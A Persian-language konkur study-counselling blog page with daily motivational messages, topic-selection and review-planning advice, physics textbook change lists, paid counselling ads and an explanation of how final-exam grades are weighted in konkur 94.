دلیل انتخاب این اسم هم خیلی واضحه:همه ی بچه ها فر میکنند که وضعیت تحصیلیشون صفره وهیچی نخوندنو بلد نیستن  ولی من معتقدم همین درصدهای کمی که بدست میارید ۲۰-۳۰ درصد کم هست ولی خودش میتونه با ۲۰-۳۰ درصد دیگه جمع بشه و مارو بالا بکشه.

 

پیام مشاوره ای امروز:۱

#من_صفر_نیستم آخرین آزمونی که زدمو بررسی میکنمو لیستی از مباحثی که توشون سوالات درست پاسخ دادم بااونایی که پاسخ اشتباه دادم جدا میکنم تادرروزهای اینده علت این خطاها و پاسخ های اشتباه پیدا کنم.

و براساس اون یه برنامه ریزی میچینم و سعی میکنم بخونمشون و درهربازه زمانی یکی ازاون هارو برطرف میکنم.

 

 

پیام مشاوره ای امروز:۲

#من_صفر_نیستم و برای اینکه بتونم درهردرسی تعداد سوالات درست خودمو بالاببرمو درصدهام افزایش پیدا کنه از روش سه روز یکبار استفاده میکنم

فرض میکنم سه روز دیگه کنکور واقعی من هستش و اگر قرار باشه درهردرس یه مبحثی انتخاب کنم و بخونمش کدوم مبحث انتخاب میکنم؟

اگرواقعا سه روز دیگه کنکور باشه!من کدوم مبحث انتخاب میکنم که راحت باشه و بخوام روش سرمایه گذاری کنم؟

 

 

 

پیام مشاوره ای امروز:۳

#من_صفر_نیستم و میتونم این یک ماهه اخر جبران کنم. درسته ممکنه نتونم به اون چیزی که میخوام نرسم اما میتونم فاصله خودمو باهدفم کم کنم و اونو قایل دستیابی کنم تا باافتخار بگم باهدفم فاصله کمی داشتمو بهش رسیدم.

در روش سه روز یکبار هرآزمون یه مبحثی از هردرس دوره و برنامه ریزی میکنم تابتونم خودمو بالابکشم و درصدهامو بهبود ببخشم. وباید اینکارو باتسلط و تمرکز انجام بدم یادم باشه که هرآزمون که میدم یک قدم به کنکور نزدیک ترمیشم اما من ناتوان نیستم پسسس من میتونم.

 

پیام مشاوره ای امروز:۴

من_صفر_نیستم امروز را درقالب یک فایل صوتی ویژه بشنوید.برای دانلود کلیک کنید.

پیام مشاوره ای امروز:۵

#من_صفر_نیستم و توی این روزهای باقی مونده با انرژی تمام  ادامه میدم و یادم میمونه که درسته توی این روزها نمیشه یک شد ولی میتونم ازاینی که هستم فاصله ی خودمو کمتر کنم حتی شده هزارتا

 

 

پیام مشاوره ای امروز:۶

#من_صفر_نیستم و توی ریاضی چند مبحث انتخاب میکنم و روی همونا تمرکز میکنم مباحثی مثل احتما و آمار دنباله و لگاریتم مثلثات و تابع میتونه جز مباحث به نسبت ساده ای باشه که برای این روزهای انتخابش میکنمو ازش استفاده میکنم تابتونم حداقل به ۲۰ درصد واقعی برسم

 

پیام مشاوره ای امروز:۷

#من_صفر_نیستم و توی فیزی چند مبحث ساده ترنسبت به بقیه انتخاب میکنم تا بتونم روشون تمرکز کنم و به سوالهاش پاسخ بدم  فصلهای پیش دو و کارانرژی گزما وقانون گازها و ویژگی های ماده وشاید هم البته اگر وقت شد اینه و نور و عدسی میتونه جز مباحثی باشه که برای این مدت انتخابشون کنم تاتوی فیزیک حداقل دیگه صفر نباشم.

 

پیام مشاوره ای امروز:۸

#من_صفر_نیستم و توی زیست  هرچند که میگن مفهومی وو ترکیبی هستش اما میتونم بازم چندتا تست ساده  ی مستقل از ۵فصل اول سال سوم ویا چهارفصل اخر سال دوم و چهارم برای خودم انتخاب کنمو بخونم تا به تستهای مستقل اینها پاسخ بدم البته بشرطی که بتونم تمرکزمو خووب و پرقدرت بذارم روی این مباحث.

 

پیام مشاوره ای امروز:۹

#من_صفر_نیستم و توی شیمی یااینکه ممکنه ضعیف باشم اما روی شیمی دوم  و شاید هم بعضی فصلهای شیمی سومو چهارم که باهاشون راحتترم بیشتر وقت بذارمو تمرکزمو ببرم بالا تابتونم به سوالات حفظی و محاسباتی ساده ای که ازاین قسمت ها میاد پیام بدمو خودمو بالا بکشم.

 

پیام مشاوره ای امروز:۱۰

#من_صفر_نیستم و میتونم مطمعنم که میتونم پرقدرت و محکم تااخرش ادامه بدم…

 

پیام مشاوره ای امروز:۱۱

#من_صفر_نیستم و اراده ام اینه که توی این روزها حداقل یه رتبه ابرومند بیارم با برنامه ریزی فایل صوتی زیر ده هزار شو میتونی درصدهای مورد نیاز خودتو بدست بیاری

توی شش روز زیر ده هزار شو همین الان دانلود کنید.

 

انگیزشی ویژه هفته ی اخر کنکور 

درروزهای پایانی چه باید انجام بدیم؟

چگونه باید درس بخوانیم؟

در روزهای منتهی به کنکور کدام فصلها و مطالب را بخوانیم؟

همه یا این ها در فایل صوتی انگیزشی روزهای اخر کنکور

http://s7.picofile.com/file/8259179668/angizeshi_ruzhaye_akhare_konkur.mp3.html

 

پست انگیزشی اختتامیه کنکور سال گذشته همین موقع

کنکور ۹۴ هم تموم شد خسته نباشی

خداقوت

ناامیدی؟

دپرس شدی؟سوالاتت سخت بوده؟؟

هرچی بود تموم شد تموووووم گذشت 

خواهر/برادر گلم یه فایل صوتی ضبط کردم براتون که ازش استفاده کنیدو دانلودش کنید.

جشن اختتامیه کنکور ۹۴ گرفتیم شماهم باما توی این جشن همراه باشین.

صحبت هایی درباره ی سوالات کنکور و توصیه هایی درباره ی فرایند انتخاب رشته و رشته ی  تحصیلی اینده شما 

باماهمراه باشید.

DPS_download

sig

 

________________________________________________________________________________

برای بهره مندی از نکات بیشتر روزانه میتوانید به روزشمار کنکور سراسری رفته و هرروز نکاتی انگیزشی -مشاوره ای-دریافت کنید.

جهت مشاهده روز شمار کنکور اینجا کلیک کنید.

دوران جمع بندی و مشکلات آن

jam-bandi-konkour100-800x445

باسلام خدمت شما داوطلبان و دانش اموزان عزیز

معمولا هرساله بعد از ایام امتحانات دانش اموزان وارد دوران جمع بندی میشوند.اما این جمع بندی باید چگونه و با چه روشی باشد؟قصد دارم در این مقاله باشما درباره ی انواع روش های جمع بندی و همچنین معضلات جمع بندی صحبت کنم.

معمولا اکثر دانش اموزان به  خیال خود که درسهایی که خوانده اند را با یک دور دیگر بصورت اجمالی و روزنامه ای وار برای بار اخر در ذهن خود ثبت کنند.

اما ایا برای جمع بندی درسها بصورت تستی و برای کنکور ویاازمون های ازمایشی هم به همین نحوه ست؟

جمع بندی انواع مختلفی داره بهتره بگیم ما در هرکاری انواع جمع بندی رو دارم

برنامه ریزی های جمع بندی

بقچه ای-پله ای – شناور-زیگوراتی- دسته ای و….

که هرکدوم اونها هم روشهای خاص خودشون ویاازهمه مهمتر معضل و مشکلات خودشونو دارند.

مشکلاتی مثل اینکه زمانی که داری درسیو میخونی ولی احساس میکنی که فراموشش کردی

مشکلاتی مثل اینکه دوهفته ویا یکماه پیش یه درس کامل بستی و تموم کردی ولی الان که داری میخونی احساس میکنی فراموشش کردی و سادت نمیاد که اصلا چجوری هستش.

وکلی مشکلات که دیگه در این فایل صوتی کامل و جامع انواع جمع بندی وروشهای قابل اجرایی اونها بهمراه مشکلات و معضلاتی که درحین جمع بندی براتون ایجاد میکنه شرح دادم.

و دراخر ویژگی های یه برنامه ی جامع جمع بندی خوب بهتون گفتم تابتونید درسهای خودتونو کامل و جامع بصورت اصولی و درست جمع بندی کنید.

برای دانلود فایل صوتی کلیک کنید.

۱۹۴۲۲۵

برنامه ریزی ۵ هفته ایی فشرده جمع بندی پایه و پیش

 

 

 

سلام به همه ی ۹۵ ایی ها

اره درست شنیدی!تویی که فکر میکنی باختی خودتو و به فکر کنکور ۹۵ هستی

باتوحرفی ندارم .من طرف حسابم اونایی که ناامید شدن کم اوردن خسته شدن

برای اونا یه برنامه ریزی توپ اماده کردیم

که تیر آخرشونو پرتاب کنن

که اگه به هدفم نخوره نزدیکای هدف میخوره 

کاری بکنه کارستون

ناامید نباش چون اون خدایی که بالا سرماست خیلی دوسمون داره

ومطمعن باش توروبیشتر 

یه برنامه ریزی ۵ هفته ایی براتون گذاشتم که توی ۵ هفته از ۶ هفته ی باقی مونده تاکنکور تمامی درسهای پایه و پیش تموم کنید یه دور کامل بخونیدش

خودم به شخصه این برنامه رو خیلی دوس دارم

شانس موفقیتش بالاست ازمخمصه نجاتت میده

توضیحات بیشتر درفایل صوتی:

 

DPS_download

(( دوستانی که درتاریخ های ۱۲تا ۱۸ اردیبهشت این برنامه بدستشون میرسه برنامه رو از هفته ی دوم شروع کنن و برنامه ی هفته ی اول بین سایر هفته ها پخش کنن)) 

 

 

***برنامه دروس تخصصی بچه های ریاضی که توی فایل جاافتاده به اینصورت خواهدبود:

هفته ی اول دیفرانسیل و گسسته
هفته ی دوم حسابان
هفته ی سوم هندسه پایه و پیش

***راستی فقط یادم رفت توی فایل صوتی تعداد تست هارو مشخص کنم

تعدا تست ها توی هرهفته به اضای هرفصل دردسهای تخصصی ۱۲۵تا

ودرسهای عمومی ۲۰تا برای هردرس و هرکتاب عمومی ۲۰۰تاست.

 

 

sig

 

 

 

برنامه ریزی ویژه جمع بندی ۵ هفته ای

 

 

برنامه ریزی جمع بندی ویژه امتحانات ترم اول و ازمونهای جمع بندی ترم اول

فرصتی دوباره برای شروعی محکم و قوی ویژه ی کسانی که “واقعااااا” میخواهند شروع کنند.

دراین برنامه ریزی شما میتونید به راحتی بابرنامه ریزی مطابق باازمون جمع بندی گزینه دو و قلم چی خودتون افزایش تراز مناسبی داشته باشید تابتونید دوماه مهرو ابان و الانم که آذر بهش اضافه شده جبران کنید.

 

خیلی ها این روزها پیام میدن اقای محمدی میشه واقعا؟من تازه ازمون ثبت نام کردم !. من تازه میخوام شروع کنم

تاالان هیچکاری نکردم!

تاالان ازخودم راضی نیستم چیکارکنم؟یعنی واقعا تموم میشه؟میتونم ؟ میتونم به اون هدفی که میخوام برسم؟

میخوام بهت بگم منه محمدی بارها بهم ثابت شده هروقت ماهی ازاب بگیری تازه ست یعنی چی؟یعنی اینکه اگر واقعااا واقعا قصدت شروع درس باشه میتونی ازاونچیزی که هستی یه جهش قدرتمند و بلند داشته باشی وخودتو به هدفی که میخوای برسونی

دراین فایل صوتی برنامه ریزی ۵ هفته ی برای همه ی طیف های داوطلبان گذاشتم که دیگه حتی بهونه ای هم نداشته باشی که اقا نمیشه امتحان داریمو این حرفا

حالا خودت میدونی:

چندتا راه کار گذاشتم واستون هم برای سال چهارمی ها که امتحانات ترم اول دارن چه قلمچی ها وچه گزینه۲ ایی ها وهم برای فارغ التحصیلها که دیگه هیچ بهونه ای نباشه که اقا باما جور درنمیادو نمیشه اینحرفا….

حالا خودت میدونی من تمامی حرفارو بهت زدم حالا باقیش باخودته که چه کنی؟ و چجوری بخونی؟ و بکجا پیش ببری؟

بعداز کمی صحبت های انگیزشی درخصوص برنامه ریزی و نحوه ی چینش دروس و جبران ازمون های گذشته براتون صحبت کردم

هم اکنون این فایل صوتی برنامه ریزی به رایگان دانلود کنید.

 

download_sds

*****

هرچیزی که برای شروع نیاز باشه

 

 

سلام عرض تبریک به مناسبت شروع سال تحصیلی جدید و همچنین تبریک عید سعید قربان عید بندگی و رستگاری

وباامید سربلندی و پیروزی در سال تحصیلی جدید و تمامی مراحل زندگی

برای شروع سال تحصیلی جدید تصمیم گرفتم پکیجی از فایل های صوتی مختلف که برای شروع شما فکر میکنم نیاز باشه تهیه کنم که اینجا میتونید دریافتشون کنید تا شمارو از هرچیزی و هرکسی بی نیاز میکنه

فایل صوتی انگیزشی ویژه شروع مهر ماه :انتخاب مشاور-تضمین موفقیت و رسیدن به اهداف

آموزش جمع بندی و بررسی بودجه بندی آزمونهای ازمایشی و برنامه و آزمون مناسب برای کنکور

آموزش تمرکز حواس و راه های تقویت تمرکز -مقابله با حواس پرتی -پرورش و تربیت ذهن اشفته و بهم ریخته برای کنکور

تنظیم ساعت مفید مطالعاتی وتنظیم ساعت خواب

آموزش تخصصی برنامه ریزی:چگونه خودمان برنامه ریزی کنیم؟۳۲۳۲

فایل صوتی-مشاوره ایی با تغییرات کتاب درسی چگونه کناربیاییم؟

فایل صوتی تعیین هدف کنکور که جز اولین و مهمترین مواد لازم کنکور ۹۵ هستش تابتونی و بدونی که چه چیزیو به عنوان هدفت باید برای خودت رای کنکور ۹۵ خودت درنظر بگیری

فایل صوتی چگونه مطالعه کنیم؟

فایل صوتی آموزش زیست خوانی

فایل صوتی چگونه شیمی دقیق و درست بخوانیم ؟

فایل صوتی آموزش ریاضی و فیزیک 

فایل صوتی آموزش چگونه ادبیات مفهومی و موضوعی بخوانیم؟ 

خدمات ویژه سایت برنامه ۱۰۰ برای سال تحصیلی جدید

۳۲راه زندگی:شخصیت کودکی و هدف زندگی

 

 مشاوره تک جلسه

جلسه رفع اشکال مطالعاتی و پرسش و پاسخ مشاوره ای-آموزش مطالعه دروس-افزایش تراز و پیشرفت در آزمون ها-هماهنگی برنامه ی آزمون و برنامه ی درسی مدرسه و امتحانات مدارس وجلوگیری از تداخل این دو که همه ساله یکی از بزرگترین مشکلات دانش آموزان سال چهارم میباشد.هزینه ۲۵ تومن

 

مشاوره ی تک جلسه به ۰۹۳۷۰۵۷۳۷۹۶ پیامک کنید.

مشاوره مستمر ماهیانه

برنامه ریزی مستمر+۱۰ جلسه مشاوره تلفنی+مشاوره ی انگیزشی رفع اشکال مطالعاتی و پرسش و پاسخ مشاوره ای-آموزش مطالعه دروس-افزایش تراز و پیشرفت در آزمون ها و شخصی سازی برنامه ی آزمونها باتوجه به درسهای مدرسه+متناسب با برنامه درسی مدرسه و آزمون آزمایشی و کلاس کنکور.ماهانه ۱۰۰تومن 

مشاوره ماهیانه به ۰۹۳۷۰۵۷۳۷۹۶ پیامک کنید.

تغییرات فیزیک کنکور۹۵

فیزیک دوم دبیرستان
فصل ۱
۱ – گرافیک کتاب تغییرات باحالی داشته است.
۲ – در فصل اول مبحث معرفی فیزیک ۵ صفحهای در یک صفحه خلاصه شده است!
۳ – در چاپ جدید فعالیت ۱ – ۱ صفحه ۳ کمی بهبود پیداکرده!
۴ – توضیحات در مورد یکا و اندازه گیری کمی بیشتر شده و یک تصویر مقایسهی
طولها نیز اضافه شده.
۵ – جدول ۵ کمیت اصلی در صفحهی ۶ اضافه شده است.
۶ – فعالیت ۱ – ۳ در صفحه ۶ اضافه شده است.
۷ – توضیحات پیشوند یکاها خلاصه تر شده است.
۸ – تمرین ۱ – ۱ در صفحه ۷ تغییراتی داشته است .
۹ – مثال ۱ – ۱ و تمرین ۲ – ۱ در صفحه ۸ عوضشده و بهبودیافته اند .
۱۰ – توضیحات در مورد کار با کولیس و اندازهگیری طول اضافهشده است (صفحه ۹ )
۱۱ – در بخش اندازهگیری جرم نیز مطالب و تصاویر و همچنین یک مثال و فعالیت
اضافهشده است .(صفحه ۱۰ و ۱۱)

۱۲ – در صفحه ۱۱ فعالیت مربوط بهاندازه گیری زمان و مایعات با یکدیگر ادغامشده
است .
۱۳ – توضیحات مربوط به خطای اندازهگیری حذفشده و فقط فعالیت مربوط به آن
باقیمانده است .
۱۴ – توضیحات مربوط به کمیتهای نردهای و برداری در قسمتی اضافه و در قسمتی
خلاصهتر شدهاند . (صفحه ۱۲ )
۱۵ – در صفحه ۱۴ مثال ۱ – ۳ اضافه شده است .
۱۶ – مثال ۱ – ۴ در صفحه ۱۴ دارای تغییراتی است .
۱۷ – در صفحات بعد نیز مثالها و فعالیتها خلاصهتر شده و تغییر کردهاند .
۱۸ – فرم کلی بخش تمرینهای آخر کتاب تغییر کرده و به دو قسمت پرسشها و
مسائل تغییریافته است .
درمجموع تعداد پرسشها افزایش یافته ، مرتبتر شده و تمرین شماره ۱۲ نیز از
ویرایش ۹ کتاب هالیدی اضافه شده است!

فصل ۲
۱ – بهروزآوری تصاویر و حروفچینی در صفحات اول فصل
۲ – در توضیح مکان و جابجایی ، مقدمه چینی در مورد بردار مکان و مکان جسم در
صفحه حذف شده و مطلب کاربردیتر ، مفهومیتر و همراه با اشکال زیباتری توضیح
داده شده است.
۳ – در توضیح مکان و جابجایی مثالها تغییر و بهبودیافتهاند.
۴ – توضیحات مربوط به نمودار مکان-زمان خلاصه و مفیدتر شدهاند.
۵ – در بخش سرعت متوسط توضیحات مفهومی تر شده و مثالها کمتر و بهتر شده اند
.
۶ – در توضیح سرعت لحظهای مطلب صرف ا مفهومی شده و توضیحات حدی از روی
نمودار کام لا حذف شده اند .(توضیح این مطلب به کتاب فیزیک پیش دانشگاهی
واگذارشده است) 
۷ – در بخش حرکت یکنواخت ، مثالها بهبود پیداکرده و ملموس تر شده اند .یک
تمرین دیگر نیز به این بخش اضافه شده است .
۸ – توضیحات مربوط به نمودار سرعت – زمان حذف شده است!
۹ – در آموزش شتاب متوسط مثالهای بهتری جایگزین شده و توضیحات مربوط
بهشتاب لحظه ای حذف شده است.

۱۰ – در چاپ قبلی تمرینهایی مربوط بهشتاب لحظه ای وجود داشت که همگی
حذف شده اند!
۱۱ – در قسمت حرکت با شتاب ثابت مثالهای ملموس تری جایگزین شده است .
۱۲ – مثال ۲ – ۱۵ به تازگی به کتاب اضافه شده است .
۱۳ – اثبات رابطه  ی ۲ – ۱۴ از کتاب حذف و به عنوان یک تمرین به دانش آموز واگذارشده
است .
۱۴ – سقوط آزاد کلا از این کتاب حذف شده است!
۱۵ – در قسمت پرسشهای انتهایی ، سؤالات بسیار جالب ، مفید و مفهومی اضافه شده
است .
۱۶ – در قسمت مسائل نیز سؤالات متعدد و کاربردی اضافه شده و سؤالات مربوط به
سقوط آزاد حذف شدند .

فصل ۳
۱ – به طورکلی در این کتاب توضیحات خلاصهتر و در بخشهایی هم مفصل تر شدند…
متن کتاب بهینه شده است!
۲ – توضیحات مربوط به قانون هوک از ابتدای فصل به انتها منتقل شدند.
۳ – توضیحات قانون اول نیوتن خلاصه تر شده و آزمایش تخته هوا حذف شده است.
۴ اضافهشده است .){ برآیند }- در بیان قانون دوم نیوتن ، برای نیرو زیر وند
حرکت هوشمندانه!(
۵ – به طور کل مؤلفین مثالهای متفاوتی را برای این کتاب انتخاب نموده اند . مثالهای
طبیعی و روزمره با داده های متفاوت .
۶ – تعریف قانون سوم نیوتن خلاصه تر و جذابتر شده است و در این تعریف از نیروی
آشنای مغناطیسی بجای نیروی گرانشی استفاده شده است .
۷ – با توجه به حذف توضیحات مربوط به سقوط آزاد ، استدلال شتاب گرانی در اینجا
متفاوت از قبل صورت گرفته است.
۸ -استفاده از مدلسازی مولکولی در توضیح نیروی عمودی تکیه گاه علاوه بر استفاده
از قانون دوم و سوم نیوتن
۹ – تغییرات جزئی در مثال مربوط به آسانسور و اضافه کردن یک تمرین
۱۰ – انجام ساده سازی های زیادی در آزمایش ۳ – ۱

۱۱ – اضافه شدن جدول ضرایب اصطکاک ایستایی و جنبشی
۱۲ – خلاصه کردن توصیه های مربوط به استفاده از قوانین نیوتن درحرکت
۱۳ – تغییر مثالهای این قسمت (استفاده از قوانین نیوتن درحرکت)
۱۴ – تعداد تمرینها در مجموعه افزایش یافته و مرتب تر شده اند .

فصل ۴
۱ – مثالها اصلاح شده و کاربردی تر شده اند .
۲ – در کل کتاب جزئیات و کیفیت اشکال بیشتر شده است.
۳ – در روابط بجای ۱ و ۲ برای نشان دادن آغاز و پایان از i و f استفاده شده است.
۴ – در قضیه کار و انرژی مثالهای جدیدی آمده است.
۵ – آزمایش ۴ – ۱ اضافه شده است.
۶ – در این قسمت دو مثال و یک تمرین حذف شدند.
۷ – در توضیح انرژی پتانسیل گرانشی مثالها تغییر کردهاند . انرژی پتانسیل
الکتریکی هم از این کتاب حذف شده است.
۸ – حذف نمودار معروف و مثال انرژی پتانسیل الکتریکی در قسمت پایستگی انرژی
مکانیکی
۹ – طرح بحث مقاومت هوا و تأثیر آن در پایستگی انرژی مکانیکی
۱۰ – در ارائه فرمول توان ، t به دلتای t تبدیل شده است.
۱۱ – افزودن تصویر ۴ – ۷
۱۲ – تبدیل مثال ۴ – ۱۷ کتاب سابق به تمرین ۴ – ۳
۱۳ – اضافه شدن مقدار زیادی پرسش و مسئله به انتهای فصل

فصل ۵
تنها تغییر این فصل ، عوض شدن چند سؤال در انتهای کتاب و اضافه شدن یک تمرین
بوده است .
فصل ۶
در این فصل نیز تغییرات کوچکی در بخش تمرینات انتهای فصل مشاهده میشود .
مرتب شدن تمرینها ، اضافه شدن چندین تمرین کاربردی و مفهومی و حذف دو
تمرین .

فیزیک سوم دبیرستان
{تجربی}
فصل ۱
۱ – در توضیح قانون کولن ، دو آزمایشی که برای یافتن رابطه وجود داشت حذف شده
است و توضیحات مختصرتر شده است.
۲ – فرم نوشتاری رابطه ی کولن بهتر شده و برای بار قدر مطلق در نظر گرفته شده است
.
۳ – مثال ۱ – ۲ جدید ا اضافهشده که یک مثال کاربردیتر و آموزندهتر است .
۴ – یادداشت ریاضی در صفحه ۵ مفید و مختصرتر شده است.
۵ – میدان الکتریکی به طرز خلاصه تری توضیح داده شده است .
۶ – مثال ۱ – ۷ با داده های متفاوتی تغییریافته است.
۷ – مثال ۱ – ۸ نیز با تغییر داده ها بازنویسی شده است .
۸ از استدلال ریاضی » میدان الکتریکی حاصل از مجموعه ذرات باردار « – در توضیح
به جای توضیح شفاهی استفاده شده است.
۹ – مثال ۱ – ۹ بازسازی دادهای شده است.

۱۰- در خطوط میدان الکتریکی اشکال بیشتری برای هر مورد از قوانین خطوط میدان
استفاده شده است .
۱۱ – آزمایش ۱ – ۱ به کتاب اضافه شده است .
۱۲ – فعالیت ۱ – ۱ دست خوش تغییراتی بوده است .
۱۳ – مثال ۱ – ۱۱ تغییر کرده است .
۱۴ – » زنبورهای عسل و گردافشانی گلها « – بخش اضافه شده است
۱۵ – توزیع بار الکتریکی در جسم به انتهای فصل منتقل شده است .
۱۶ – انرژی پتانسیل الکتریکی بهتر و استدلالیتر توضیح داده شده است . همچنین
مطالب آموزشی درون مثالها به متن توضیحات منتقل شده است .
۱۷ – تمرین ۱ – ۴ جدید ا اضافه شده است .
۱۸ – توضیحات مربوط به پتانسیل الکتریکی مرتب تر شده است .
۱۹ – مثال ۱ – ۱۳ جدید ا به کتاب اضافه شده است .
۲۰ – مثال ۱ – ۱۴ بازنویسی شده است .
۲۱ – فعالیت ۱ – ۴ جدید ا به کتاب اضافه شده است .
۲۲ آزمایش ، » توزیع و القای بار الکتریکی « – در بخش ۱ – ۳ در کتاب سابق بهصورت
جزئی از متن کتاب درآمده است .
۲۳ – فعالیت ۱ – ۵ جدید ا به کتاب اضافه شده است.
۲۴  استفاده از مفهوم{ رسانای منزوی}

۲۵ – مثال مربوط به چگالی سطحی بار الکتریکی حذفشده است .
۲۶ – مطالعه آزاد رسوبدهنده الکترواستاتیکی به یک تمرین تبدیلشده است.
۲۷ – در بخش خازن توضیحات کاربردی و ملموستری ارائهشده است .
۲۸ – توضیحات مربوط به شارژ خازن مختصرتر شده است.
۲۹ – متن کتاب بهطورکلی مختصرتر شده و از دقت بیشتری برخوردار گردیده است .
۳۰ – توضیحات مربوط به عوامل مؤثر بر ظرفیت خازن کوتاهتر شده است .
۳۱ – در ادامه ابتدا بررسی میکروسکوپیک نقش دیالکتریک مطرحشده و بعدازآن
فروشکست مطرح میشود .
۳۲ – مثال ۱ – ۱۷ یک مثال کاربردی و زیبا جدید ا اضافهشده است .
۳۳ – در توضیحات مربوط به انرژی ذخیرهشده در خازن از استدلال و توضیحات بهتری
بهره گرفتهشده است .
۳۴ – مثال ۱ – ۱۸ تغییرات دادهای داشته است.
۳۵ – فعالیت هوشمندانه ۱ – ۸ بهتازگی اضافهشده است .
۳۶ – بستن موازی و متوالی خازنها به شکل مرتبتری بیانشده است .
۳۷ – مثالهای مربوط به این قسمت بهبودیافتهاند .
۳۸ – فعالیت جالب ۱ – ۹ به تازگی به کتاب اضافه شده است .
۳۹ – تعدادی سؤال به تمرینات انتهای بخش اضافه شده است .

فصل ۲
۱ – توضیحات مربوط به جریان الکتریکی دقیقتر و مرتبتر شده است .
۲ – فعالیت بسیار مهم ۲ – ۱ برای پاسخگویی به سؤال معمول دانش آموزان اضافه
گردیده است .
۳ – تعریف جریان لحظهای حذفشده است .
۴ – مثال ۲ – ۱ بهتازگی اضافهشده است .
۵ – کدگذاری مقاومتها بعد از تأثیر دما بر مقاومت مطرحشده است .
۶ » برخی از استانداردهای مهندسی سیمها « – اضافه شدن مطلبی تحت عنوان
۷ – قبل از بیان افت پتانسیل در مدار ، بحث نیروی محرکه مولد مطرحشده است .
۸ – در قسمت افت پتانسیل و مدار تک حلقه توضیحات مناسبتری ارائهشده است .
۹ – در این فصل تغییرات اساسی در جابجایی ترتیب بیان مطالب ، مختصر سازی و
ادغام برخی سرفصلها و همچنین کاربردی کردن و مناسبسازی مثالها بوده است .
۱۰ – افزودن تعداد زیادی مسئله و پرسش کاربردی و پیچیدهتر از کتاب گذشته .

فصل ۴
۱ – تغییرات گرافیکی معمول
۲ – در بخش عاملهای مؤثر بر نیروهای مغناطیس وارد بر سیم حامل جریان ، اثبات
رابطهی بهدستآمده حذفشده است .
۳ – طرز کار گالوانومتر از مطالعه آزاد به فناوری و کاربردها تبدیلشده است .
۴ – اثبات رابطهی نیروی وارد بر ذرهی باردار متحرک در میدان مغناطیسی حذفشده
است .
۵ – دستگاه اندازهگیری سرعت جریان خون حذفشدهاند .
۶ – کمربندهای تابشی وُن آلن اضافه گردیده است .
۷ – توضیحات مربوط به خواص مغناطیسی مواد دقیقتر شدهاند .
۸ – دو پرسش نیز در انتهای فصل به این کتاب اضافهشده است .

فصل ۵
۱ – مثالها اندکی تغییر کرده است .
۲ – اثبات رابطه خود نیروی محرکه خودالقایی حذفشده است .
۳ – محاسبهی ضریب خودالقایی در قالب یک مثال ارائهشده است .
۴ – تغییرات جریان نسبت به زمان هنگام بستن و باز کردن کلید حذفشده است .
۵ – بحث القای متقابل به کتاب اضافهشده است .
۶ – توضیحات مربوط به جریان متناوب کمی کاملتر شده است .
۷ -مبحث مربوط به مبدلها به کتاب اضافهشده است .
۸ – اضافه شدن ۶ تمرین به مسائل و پرسشهای انتهای فصل و تغییرات

فیزیک پیش دانشگاهی
(تجربی)
فصل اول
۱ – توضیحات مربوط به سرعت لحظه ای کمی بیشتر شده است .
۲ – مثال ها کمی تغییر کرده اند و چندین مثال اضافه شده است.
۳ – با توجه به حذف سقوط آزاد از کتاب فیزیک ۲ ، مطلب در اینجا کمی بیشتر توضیح
داده شده است .
۴ – اضافه شدن چند سوال به تمرین های انتهای بخش
مابقی فصول هیچگونه تغییراتی نداشته اند.

 

منبع

yummyphysics.blog.ir

فایل صوتی انگیزشی خرداد ماه

 

سلام وقتتون بخیر 

فایل صوتی انگیزشی اماده کردم که میخوام

 

باهاتون راجبه استرس هاتون درس نخوندناتون

متوقف شدناتون صحبت کنم

و بگم که چجوری بخونی

چی بکنی تا خودتو بالا بکشی

ویادت باشه توی همین مدت کوتاه که همه میگن نمیشه من میگم میشه

درسته نمیشه یک شد درسته نمیشه درصد خودمونو از ۵۰به ۹۰ برسونیم

ولی درعوض میشه….

لطفا نظر فراموش نشه.

یاعلی..DPS_download

 

sig

محاسبه تاثیر معدل در کنکور

سلام.خیلی ها اینروزها از نحوه ی تاثیر معدل درکنکور همه سوال دارن که چجوری میشه و به چه صورته

مهمترین رفع ابهامی که باید براتون داشته باشم اینه که معدل شما درکنکور تاثیر نخواهد داشت وهمونطورکه در پایین خواهید دید

این نمرات کتبی امتحانات نهایی سال سوم شماست که تاثیر گذار خواهد بود براتون.

.moadel

تاثیر معدل در کنکور ۹۴

قبل از همه  باید بگم که فقط معدل نهایی سوم دبیرستان هر درس در کنکور ۹۴ تاثیر داره. پس تاثیر معدل در کنکور ۹۴ فقط مربوط به امتحانات نهایی سال سوم هستش.

ثانیا باید بگم تاثیر معدل در کنکور ۹۴ فعلا باید همون ۲۵% بدونیم ولی خب شاید تا موقع کنکور یکم بیشتر بشه.

.

نحوه تاثیر معدل در کنکور ۹۴

خب ما واسه محاسبه تاثیر معدل در کنکور ۹۴ دو تا نمره داریم:

یکی همون درصدایی که تو کنکور زدیم و یکی هم معدل درسمون در امتحان نهایی. حالا تاثیر معدل در کنکور ۹۴ اینجوری محاسبه میشه که درصدای کنکورمون رو از ۷۵ درصد حساب میکنن و معدل کتبی سال سوم رو از ۲۵ حساب می کنند بعد با هم جمع می کنند.

بذار یه مثال بزنم. اگه کسی تو کنکور در درس ادبیات به ۶۰ درصد سوالا جواب بده و معدل کتبیش ۱۶ باشه اونوقت نمراتش اینجورین:
خب حالا گفتیم درصد کنکور از ۷۵% و معدل سال سوم هم از ۲۵%

۶۰*۰.۷۵= ۴۵%

۱۶/۲۰*۰.۲۵=۲۰%

۴۵%+۲۰%=۶۵%

پس واسه این شخص بدون معدل درصدش %۶۰ و با معدل نمره اش ۶۵% میشه . پس این داوطلب معدل واسش تاثیر مثبت داشته.

.

.

این که حالا میگن تاثیر منفی معدل در کنکور یعنی چی؟

ببینین الان این شخص درصد خودش ۶۰% بوده. معدل واسش تاثیر مثبت داشته و درصدش شده ۶۵%

حالا فرض کنین معدل این فرد در نهایی ۱۰ بوده باشه:

۶۰*۰.۷۵=۴۵%

۱۰/۲۰*۰.۲۵=۱۲%

۴۵%+۱۲%= ۵۷%

خب پس تاثیر معدل باعث شده درصد فرد مورد نظر کمتر بشه درسته؟ میخواست ۶۰% باشه شده ۵۷% .

.

حالا نمره ۲۰ نهایی و تاثیرش بر همین شخص :::

حالا یه مثال جالب دیگه تا خیالتون راحت بشه معدل اونقدرام معجزه نمیکنه:

فرض کنین همین فرد که کنکور رو ۶۰% زده معدل ادبیاتش در نهایی هم ۲۰ بوده باشه:

۶۰*۰.۷۵=۴۵%

۲۰/۲۰*۰.۲۵=۲۵%

۴۵%+۲۵%=۷۰%

خیلی فرق کرد؟؟؟؟

تاثیر معدل در کنکور ۹۴ با تراز است :

